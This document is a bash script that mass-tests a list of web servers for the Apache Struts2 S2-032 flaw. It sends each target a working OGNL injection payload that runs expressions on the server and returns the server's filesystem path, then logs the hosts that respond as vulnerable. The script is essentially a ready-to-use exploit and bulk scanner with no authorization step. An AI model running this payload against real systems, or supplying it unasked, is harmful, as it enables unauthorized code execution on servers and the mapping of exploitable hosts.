#!/usr/bin/env bash # # Struts2 S2-032 checking tools. # author: 7ym0n.q6e/bb.qnyd@gmail.com # Copyleft (C) 2016 7ym0n.q6e. All rights reserved. # # Struts S2-032 is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with Struts S2-032. If not, see <http://www.gnu.org/licenses/>. # tools=`which http` if [ $tools = "" ];then echo -e "\033[0;31m ERROR:\thttp not found." echo -e "\033[0;31m Pealse install httpie tools." echo -e "\033[0;31m github project:\thttps://github.com/jkbrzt/httpie" fi if [[ "$1" = "" || "$2" = "" ]];then echo -e "\033[0;32m HELP:" echo -e "\033[0;32m ./s2-032.sh [URLS FILE] [RESULT FILE]" echo -e "\033[0;32m website url write to URLS FILE" echo -e "\033[0;32m Example:" echo -e "\033[0;32m echo -e \"127.0.0.1:8080\\\n192.168.1.28:8080\" >> urls.txt;" echo -e "\033[0;32m ./s2-032.sh urls.txt out.txt" echo -e "\033[0;32m" exit 0; fi count=`wc -l $1` urls=`cat $1`; echo "out file,clearing..." rm -rf $2 echo "exploiting..." n=1 for u in $urls; do echo -e "\033[0;32m[$n/$count]" n=$(($n+1)) #echo $u; if [ "$u" != "" ];then rst=`http "$u?method:%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23req%3d%40org.apache.struts2.ServletActionContext%40getRequest%28%29,%23res%3d%40org.apache.struts2.ServletActionContext%40getResponse%28%29,%23res.setCharacterEncoding%28%23parameters.encoding[0]%29,%23path%3d%23req.getRealPath%28%23parameters.pp[0]%29,%23w%3d%23res.getWriter%28%29,%23w.print%28%23path%29,1?%23xx:%23request.toString&pp=%2f7ym0n.jsp&encoding=UTF-8"` mach=`echo $rst | grep "7ym0n.jsp"` if [ "$mach" != "" ];then echo $u $mach >> $2 fi fi done echo "Done!!!" exit 0;